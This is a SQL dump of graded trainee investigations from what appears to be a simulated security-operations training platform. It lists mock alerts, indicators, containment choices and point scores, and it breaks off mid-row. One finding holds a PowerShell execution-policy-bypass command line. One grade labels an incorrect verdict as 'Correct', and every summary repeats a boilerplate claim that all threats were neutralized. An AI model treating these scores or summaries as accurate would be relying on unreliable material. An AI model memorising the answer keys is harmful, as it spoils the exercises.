(324, 213, 1271, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.8.50\",\"ip-192.168.8.51\"],\"selectedActions\":[\"close_alert\"],\"verdict\":\"false_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 26/2/2026, 18:24:40\\nALERT: False Positive: Routine Database Synchronization Detected\\nVERDICT: FALSE POSITIVE\\n\\nKEY FINDINGS (2)\\n----------------\\n- [IP] 192.168.8.50\\n- [IP] 192.168.8.51\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (1)\\n------------------------------\\n- Close (No Action)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-26T21:24:47.726Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). Artifact analysis completed (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-26 21:19:30', '2026-02-28 21:00:00', 0, NULL),
(325, 213, 269, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.45\",\"ip-203.0.113.50\",\"hash-d41d8cd9\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"escalate\",\"block_hash\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 26/2/2026, 18:30:49\\nALERT: BlackEnergy Malware Execution [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.45\\n- [IP] 203.0.113.50\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n- [FILENAME] invoice.doc\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-26T21:30:51.247Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-26 21:29:19', '2026-02-28 21:00:00', 0, NULL),
(326, 213, 270, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"hash-3fa85f64\",\"artifact_1\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 26/2/2026, 18:32:15\\nALERT: Persistence Mechanism Established [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 203.0.113.45\\n- [HASH] 3fa85f64-5717-4562-b3fc-2c963f66afa6\\n- [IP] 10.0.1.15\\n- [FILENAME] C:\\\\Users\\\\compromised_user\\\\AppData\\\\Local\\\\Temp\\\\malicious.exe\\n- [USERNAME] compromised_user\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-26T21:32:35.654Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-26 21:30:51', '2026-02-28 21:00:00', 0, NULL),
(327, 213, 271, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.101\",\"ip-10.0.0.5\",\"hash-5f4dcc3b\",\"artifact_3\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 26/2/2026, 18:34:07\\nALERT: Lateral Movement to OT Network [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.101\\n- [IP] 10.0.0.5\\n- [HASH] 5f4dcc3b5aa765d61d8327deb882cf99\\n- [USERNAME] jdoe\\n- [IP] 203.0.113.55\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-26T21:34:08.145Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-26 21:32:35', '2026-02-28 21:00:00', 0, NULL),
(328, 213, 272, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.105\",\"ip-10.0.0.20\",\"hash-5d41402a\",\"artifact_2\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 26/2/2026, 18:35:25\\nALERT: SCADA System Compromise [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (6)\\n----------------\\n- [IP] 192.168.1.105\\n- [IP] 10.0.0.20\\n- [HASH] 5d41402abc4b2a76b9719d911017c592\\n- [IP] 203.0.113.45\\n- [FILENAME] malicious_script.sh\\n- [USERNAME] unauthorized_user\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-26T21:35:25.868Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-26 21:34:08', '2026-02-28 21:00:00', 0, NULL),
(329, 213, 274, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-10.0.0.15\",\"artifact_3\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 26/2/2026, 18:38:14\\nALERT: Phishing Attempt via Weaponized Job Offers [OP: Operation Silent Tsunami]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 10.0.0.15\\n- [EMAIL] recruiter@example.com\\n- [FILENAME] JobOffer.docm\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (4)\\n------------------------------\\n- Block IP/Domain\\n- Block File Hash\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-26T21:38:14.483Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (4/5)\",\"missed_items\":[\"reset_credentials\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-26 21:35:33', '2026-02-28 21:00:00', 0, NULL),
(330, 210, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-26 21:36:40', '2026-02-26 21:36:40', 0, NULL),
(331, 213, 275, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.45\",\"ip-203.0.113.5\",\"hash-e99a18c4\",\"cmd-1\",\"artifact_1\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 26/2/2026, 18:39:37\\nALERT: Malicious Code Execution on Developer Systems [OP: Operation Silent Tsunami]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (6)\\n----------------\\n- [IP] 192.168.1.45\\n- [IP] 203.0.113.5\\n- [HASH] e99a18c428cb38d5f260853678922e03\\n- [COMMAND] powershell.exe -ExecutionPolicy Bypass -File C:\\\\Users\\\\dev_user01\\\\malicious_script.ps1\\n- [USERNAME] dev_user01\\n- [FILENAME] malicious_script.ps1\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-26T21:39:42.138Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-26 21:38:14', '2026-02-28 21:00:00', 0, NULL),
(332, 213, 276, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.15\",\"ip-10.0.0.5\",\"ip-203.0.113.45\",\"hash-3f5d8f3e\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 26/2/2026, 18:40:58\\nALERT: Establishing Persistence and Lateral Movement [OP: Operation Silent Tsunami]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (6)\\n----------------\\n- [IP] 192.168.1.15\\n- [IP] 10.0.0.5\\n- [IP] 203.0.113.45\\n- [HASH] 3f5d8f3e5c4c4099d2a3f3a7b9b7b6f1\\n- [USERNAME] jdoe\\n- [FILENAME] persistence_tool.exe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-26T21:40:59.803Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-26 21:39:42', '2026-02-28 21:00:00', 0, NULL),
(333, 213, 277, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-10.0.0.5\",\"hash-e3b0c442\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 26/2/2026, 18:43:12\\nALERT: Cryptocurrency Exfiltration and Laundering [OP: Operation Silent Tsunami]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 10.0.0.5\\n- [HASH] e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\n- [EMAIL] attacker@malicious.com\\n- [FILENAME] exfil_transaction_details.csv\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (5)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-26T21:43:14.905Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-26 21:41:02', '2026-02-28 21:00:00', 0, NULL),
(334, 210, 937, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.100\",\"ip-192.168.1.10\",\"artifact_2\"],\"selectedActions\":[\"reset_credentials\",\"isolate_host\",\"collect_forensics\",\"close_alert\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/26/2026, 4:49:51 PM\\nALERT: Unusual Login Failure from Known Safe IP\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (3)\\n----------------\\n- [IP] 192.168.1.100\\n- [IP] 192.168.1.10\\n- [USERNAME] bsmith\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (5)\\n------------------------------\\n- Isolate Host\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n- Close (No Action)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-26T21:49:59.093Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Incorrect verdict. Expected false_positive, got true_positive. Artifact analysis completed (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Needs improvement\"}', NULL, '2026-02-26 21:42:08', '2026-02-28 21:00:00', 0, NULL);
INSERT INTO `investigations` (`id`, `user_id`, `alert_id`, `status`, `grade`, `feedback`, `executive_summary`, `ai_summary`, `ai_evaluation_scheduled_at`, `created_at`, `updated_at`, `is_reported`, `report_reason`) VALUES
(335, 213, 278, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.15\",\"ip-203.0.113.45\",\"artifact_2\",\"artifact_3\",\"artifact_4\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 26/2/2026, 18:44:40\\nALERT: Compromised Update Detected [OP: Operation Glass Serpent]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.15\\n- [IP] 203.0.113.45\\n- [HASH] e5d8870e5bdd26602c622b7e5b0f6b4c\\n- [FILENAME] lib_mgmt.dll\\n- [USERNAME] admin_user\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-26T21:44:41.105Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-26 21:43:21', '2026-02-28 21:00:00', 0, NULL),
(336, 213, 279, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.15\",\"ip-203.0.113.45\",\"hash-b1946ac9\",\"artifact_3\",\"artifact_4\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 26/2/2026, 18:45:36\\nALERT: Execution of Malicious Code [OP: Operation Glass Serpent]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.15\\n- [IP] 203.0.113.45\\n- [HASH] b1946ac92492d2347c6235b4d2611184\\n- [FILENAME] malicious.dll\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-26T21:45:38.784Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-26 21:44:41', '2026-02-28 21:00:00', 0, NULL),
(337, 213, 280, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-192.168.1.10\",\"hash-abc123de\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 26/2/2026, 18:46:38\\nALERT: Establish Persistence [OP: Operation Glass Serpent]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 192.168.1.10\\n- [HASH] abc123def4567890abc123def4567890\\n- [USERNAME] admin_user\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-26T21:46:38.462Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-26 21:45:38', '2026-02-28 21:00:00', 0, NULL),
(338, 213, 281, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.105\",\"ip-10.0.0.55\",\"ip-203.0.113.45\",\"hash-e99a18c4\",\"artifact_4\",\"artifact_6\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 26/2/2026, 18:47:43\\nALERT: Lateral Movement and Data Exfiltration [OP: Operation Glass Serpent]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (6)\\n----------------\\n- [IP] 192.168.1.105\\n- [IP] 10.0.0.55\\n- [IP] 203.0.113.45\\n- [HASH] e99a18c428cb38d5f260853678922e03\\n- [FILENAME] confidential_data.xlsx\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-26T21:47:43.288Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-26 21:46:38', '2026-02-28 21:00:00', 0, NULL),
(339, 213, 285, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-185.92.220.34\",\"ip-10.0.2.15\",\"artifact_2\",\"artifact_3\",\"artifact_4\"],\"selectedActions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 26/2/2026, 18:50:00\\nALERT: Spear-Phishing Email Campaign Detected [OP: Operation Phantom Ballot]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 185.92.220.34\\n- [IP] 10.0.2.15\\n- [EMAIL] john.doe@fakeorg.com\\n- [HASH] e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\n- [URL] http://malicious-link.com/login\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (5)\\n------------------------------\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-26T21:50:20.996Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-26 21:47:47', '2026-02-28 21:00:00', 0, NULL),
(340, 213, 286, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-10.14.22.5\",\"ip-203.0.113.45\",\"hash-d41d8cd9\",\"domain-http://login\",\"domain-login-secure\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 26/2/2026, 18:52:12\\nALERT: Malicious Domain Infrastructure Identified [OP: Operation Phantom Ballot]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 10.14.22.5\\n- [IP] 203.0.113.45\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n- [DOMAIN] http://login-secure-portal.com/login\\n- [DOMAIN] login-secure-portal.com\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-26T21:52:13.392Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-26 21:50:21', '2026-02-28 21:00:00', 0, NULL),
(341, 213, 287, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-10.0.0.25\",\"hash-e99a18c4\",\"artifact_2\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 26/2/2026, 18:53:40\\nALERT: OAuth Token Abuse Technique Detected [OP: Operation Phantom Ballot]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 10.0.0.25\\n- [HASH] e99a18c428cb38d5f260853678922e03\\n- [USERNAME] j.doe@company.com\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-26T21:53:40.267Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-26 21:52:13', '2026-02-28 21:00:00', 0, NULL),
(342, 213, 288, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-185.92.220.50\",\"ip-192.168.1.105\",\"artifact_3\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 26/2/2026, 18:54:38\\nALERT: Disinformation Campaign Planning Uncovered [OP: Operation Phantom Ballot]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 185.92.220.50\\n- [IP] 192.168.1.105\\n- [HASH] 8a7f5e3c1d4f8e1b6c3d8f7a3e2d4c5b6a1f7e8d5c2b3a4d8e3f7c1b6d2a7f9e\\n- [FILENAME] election_strategy_2023.pdf\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-26T21:54:38.371Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-26 21:53:40', '2026-02-28 21:00:00', 0, NULL),
(343, 213, 289, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-26 21:54:45', '2026-02-26 21:54:45', 0, NULL),
(344, 210, 713, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-212.47.229.1\",\"ip-192.168.1.10\",\"artifact_2\"],\"selectedActions\":[\"isolate_host\",\"collect_forensics\",\"block_ip\",\"reset_credentials\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/26/2026, 4:56:35 PM\\nALERT: Failed Login Attempts from Unusual Location\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (3)\\n----------------\\n- [IP] 212.47.229.1\\n- [IP] 192.168.1.10\\n- [USERNAME] admin\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (5)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-26T21:56:46.733Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed 